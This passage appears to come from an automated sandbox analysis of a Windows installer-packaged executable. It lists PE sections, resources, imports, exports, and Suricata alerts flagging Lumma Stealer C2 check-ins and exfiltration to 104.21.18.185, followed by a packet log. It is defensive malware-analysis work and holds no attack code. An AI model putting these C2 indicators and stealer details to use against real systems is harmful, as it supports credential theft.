.reloc	0x2c8000	0x3cd3c	0x3ce00	2de232a3f06c3a1eeba5cacbcff66694	False	0.5653033560061602	data	6.732465801732527	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x305000	0x80600	0x80600	62db700ce516ef5554274056e110a413	False	0.5100052489045764	data	7.13026651814982	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x30620c	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x306340	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x306474	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x3065a8	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x3066dc	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x306810	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x306944	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_ICON	0x306a78	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.04227680680207841
RT_ICON	0x30aca0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.07157676348547717
RT_ICON	0x30d248	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.08794559099437148
RT_ICON	0x30e2f0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.11891828058573453
RT_ICON	0x312518	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.1578838174273859
RT_ICON	0x314ac0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.010333018422295701
RT_ICON	0x318ce8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.026763485477178422
RT_ICON	0x31b290	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.02626641651031895
RT_ICON	0x31c338	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.15806754221388367
RT_ICON	0x31d3e0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.27172131147540984
RT_ICON	0x31dd68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.350177304964539
RT_ICON	0x31e1d0	0x3742	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9967481973702813
RT_ICON	0x321914	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.3323170731707317
RT_ICON	0x321f7c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.4206989247311828
RT_ICON	0x322264	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5236486486486487
RT_ICON	0x32238c	0xc45	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8701050620821394
RT_ICON	0x322fd4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1455223880597015
RT_ICON	0x323e7c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.1723826714801444
RT_ICON	0x324724	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.19508670520231214
RT_ICON	0x324c8c	0xc5c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8767383059418458
RT_ICON	0x3258e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.07354771784232365
RT_ICON	0x327e90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.0900562851782364
RT_ICON	0x328f38	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2154255319148936
RT_STRING	0x3293a0	0x204	data			0.32945736434108525
RT_STRING	0x3295a4	0x40c	data			0.37258687258687256
RT_STRING	0x3299b0	0x328	data			0.422029702970297
RT_STRING	0x329cd8	0x24c	data			0.467687074829932
RT_STRING	0x329f24	0x350	data			0.4339622641509434
RT_STRING	0x32a274	0x330	data			0.40441176470588236
RT_STRING	0x32a5a4	0x3bc	data			0.42573221757322177
RT_STRING	0x32a960	0x9c	data			0.717948717948718
RT_STRING	0x32a9fc	0x100	data			0.609375
RT_STRING	0x32aafc	0x448	data			0.38777372262773724
RT_STRING	0x32af44	0x424	data			0.3632075471698113
RT_STRING	0x32b368	0x50c	data			0.35294117647058826
RT_STRING	0x32b874	0x310	data			0.3227040816326531
RT_STRING	0x32bb84	0x37c	data			0.4327354260089686
RT_STRING	0x32bf00	0x3a4	data			0.3959227467811159
RT_STRING	0x32c2a4	0x480	data			0.3810763888888889
RT_STRING	0x32c724	0x3d4	data			0.35918367346938773
RT_STRING	0x32caf8	0x454	data			0.3925992779783393
RT_STRING	0x32cf4c	0x1ec	data			0.3983739837398374
RT_STRING	0x32d138	0xc4	data			0.6428571428571429
RT_STRING	0x32d1fc	0x170	data			0.5597826086956522
RT_STRING	0x32d36c	0x2dc	data			0.43306010928961747
RT_STRING	0x32d648	0x3f0	data			0.34226190476190477
RT_STRING	0x32da38	0x314	data			0.38578680203045684
RT_STRING	0x32dd4c	0x2f8	data			0.38026315789473686
RT_RCDATA	0x32e044	0x10	data			1.5
RT_RCDATA	0x32e054	0x1800	PE32+ executable (console) x86-64, for MS Windows	English	United States	0.3924153645833333
RT_RCDATA	0x32f854	0x148b	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0020916524054002
RT_RCDATA	0x330ce0	0x111e	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0025102692834322
RT_RCDATA	0x331e00	0xd8c	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0031718569780854
RT_RCDATA	0x332b8c	0xba8	data			0.5318364611260054
RT_RCDATA	0x333734	0x147	Delphi compiled form 'TMainForm'			0.746177370030581
RT_RCDATA	0x33387c	0x480	Delphi compiled form 'TNewDiskForm'			0.5052083333333334
RT_RCDATA	0x333cfc	0x400	Delphi compiled form 'TSelectFolderForm'			0.5087890625
RT_RCDATA	0x3340fc	0x4b5	Delphi compiled form 'TSelectLanguageForm'			0.5012448132780083
RT_RCDATA	0x3345b4	0x7e3	Delphi compiled form 'TUninstallProgressForm'			0.40713224368499257
RT_RCDATA	0x334d98	0x55c	Delphi compiled form 'TUninstSharedFileForm'			0.41690962099125367
RT_RCDATA	0x3352f4	0x2ac9	Delphi compiled form 'TWizardForm'			0.19811923673879303
RT_GROUP_CURSOR	0x337dc0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x337dd4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x337de8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x337dfc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x337e10	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x337e24	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x337e38	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x337e4c	0xae	data	English	United States	0.6379310344827587
RT_GROUP_ICON	0x337efc	0x30	data	English	United States	0.9375
RT_GROUP_ICON	0x337f2c	0x22	data	English	United States	1.0588235294117647
RT_GROUP_ICON	0x337f50	0x30	data	English	United States	0.9375
RT_GROUP_ICON	0x337f80	0x30	data	English	United States	0.9583333333333334
RT_VERSION	0x337fb0	0x514	data	English	United States	0.3046153846153846
RT_MANIFEST	0x3384c4	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3836734693877551

Imports

DLL	Import
mpr.dll	WNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
comdlg32.dll	GetSaveFileNameW, GetOpenFileNameW
comctl32.dll	FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_DrawIndirect, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
shell32.dll	SHBrowseForFolderW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, SHAppBarMessage, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
user32.dll	MoveWindow, CopyImage, SetMenuItemInfoW, GetMenuItemInfoW, DefFrameProcW, ScrollWindowEx, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, SendMessageA, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, EnumChildWindows, SendNotifyMessageW, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, ExitWindowsEx, GetClassLongW, SetScrollRange, DrawTextW, CharToOemBuffA, PeekMessageA, MessageBeep, SetClassLongW, SetRectEmpty, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, SendMessageTimeoutW, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, ValidateRect, GetCursor, KillTimer, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateIconIndirect, CreateWindowExW, GetMessageW, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, MapVirtualKeyW, OffsetRect, IsWindowUnicode, DispatchMessageW, DefMDIChildProcW, WaitForInputIdle, GetSystemMenu, SetScrollPos, GetScrollPos, InflateRect, DrawFocusRect, ReleaseCapture, LoadCursorW, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, DestroyMenu, SetWindowsHookExW, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, GetKeyboardState, ScreenToClient, DrawFrameControl, BringWindowToTop, SetCursor, CreateIcon, RemoveMenu, AppendMenuW, GetKeyboardLayoutNameW, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, PostQuitMessage, ShowScrollBar, LoadImageW, EnableMenuItem, HideCaret, FindWindowExW, MonitorFromPoint, LoadIconW, SystemParametersInfoW, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, FindWindowW, GetKeyboardLayout, DeleteMenu
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
oleaut32.dll	SafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
advapi32.dll	RegSetValueExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, GetUserNameW, RegQueryInfoKeyW, EqualSid, GetTokenInformation, RegCreateKeyExW, SetSecurityDescriptorDacl, RegEnumKeyExW, AdjustTokenPrivileges, RegDeleteKeyW, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, RegDeleteValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, ConvertSidToStringSidW, RegCloseKey, InitializeSecurityDescriptor
msvcrt.dll	memcpy
winhttp.dll	WinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
kernel32.dll	SetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, SetHandleInformation, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, GetProcessHeap, ExitProcess, HeapAlloc, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, PeekNamedPipe, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, EnumResourceNamesW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, CreatePipe, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
ole32.dll	StgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
gdi32.dll	Arc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries

Exports

Name	Ordinal	Address
__dbk_fcall_wrapper	2	0x411c18
dbkFCallWrapperAddr	1	0x6bb648

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T01:12:16.539512+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.18.185	443	TCP
2024-12-24T01:12:17.295364+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.18.185	443	TCP
2024-12-24T01:12:17.295364+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.18.185	443	TCP
2024-12-24T01:12:18.574856+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.18.185	443	TCP
2024-12-24T01:12:19.337254+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	104.21.18.185	443	TCP
2024-12-24T01:12:19.337254+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.18.185	443	TCP
2024-12-24T01:12:20.987785+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.18.185	443	TCP
2024-12-24T01:12:22.279186+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49732	104.21.18.185	443	TCP
2024-12-24T01:12:23.709376+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.18.185	443	TCP
2024-12-24T01:12:26.423291+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.18.185	443	TCP
2024-12-24T01:12:29.474434+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.18.185	443	TCP
2024-12-24T01:12:31.599207+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.18.185	443	TCP
2024-12-24T01:12:33.567801+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.18.185	443	TCP
2024-12-24T01:12:34.346561+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49743	104.21.18.185	443	TCP
2024-12-24T01:12:35.868046+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.27.229	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 01:12:15.307409048 CET	49730	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:15.307442904 CET	443	49730	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:15.307528973 CET	49730	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:15.310720921 CET	49730	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:15.310733080 CET	443	49730	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:16.539370060 CET	443	49730	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:16.539511919 CET	49730	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:16.546171904 CET	49730	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:16.546181917 CET	443	49730	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:16.546392918 CET	443	49730	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:16.594480038 CET	49730	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:16.634951115 CET	49730	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:16.635009050 CET	49730	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:16.635045052 CET	443	49730	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:17.295372963 CET	443	49730	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:17.295447111 CET	443	49730	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:17.295537949 CET	49730	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:17.297163010 CET	49730	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:17.297175884 CET	443	49730	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:17.297185898 CET	49730	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:17.297189951 CET	443	49730	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:17.313227892 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:17.313313961 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:17.313425064 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:17.313669920 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:17.313705921 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:18.574697018 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:18.574856043 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:18.575901031 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:18.575930119 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:18.576145887 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:18.577122927 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:18.577162981 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:18.577199936 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.337261915 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.337397099 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.337420940 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.337471962 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.337515116 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.337584972 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.337966919 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.345371008 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.345391035 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.345444918 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.345467091 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.345532894 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.345546007 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.353903055 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.353975058 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.353992939 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.407000065 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.407017946 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.453943014 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.456876040 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.501624107 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.528964043 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.532923937 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.532983065 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.533009052 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.540852070 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.540918112 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.540930033 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.540976048 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.541136980 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.541173935 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.541198969 CET	49731	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.541215897 CET	443	49731	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.775156975 CET	49732	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.775227070 CET	443	49732	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:19.775326014 CET	49732	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.775906086 CET	49732	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:19.775926113 CET	443	49732	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:20.987673998 CET	443	49732	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:20.987785101 CET	49732	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:20.989682913 CET	49732	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:20.989713907 CET	443	49732	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:20.989969015 CET	443	49732	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:20.991607904 CET	49732	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:20.991977930 CET	49732	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:20.992038965 CET	443	49732	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:20.992109060 CET	49732	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:20.992125988 CET	443	49732	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:22.279207945 CET	443	49732	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:22.279269934 CET	443	49732	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:22.279331923 CET	49732	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:22.279475927 CET	49732	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:22.279498100 CET	443	49732	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:22.494121075 CET	49734	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:22.494170904 CET	443	49734	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:22.494252920 CET	49734	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:22.494573116 CET	49734	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:22.494590044 CET	443	49734	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:23.709280014 CET	443	49734	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:23.709376097 CET	49734	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:23.710572958 CET	49734	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:23.710598946 CET	443	49734	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:23.710835934 CET	443	49734	104.21.18.185	192.168.2.4
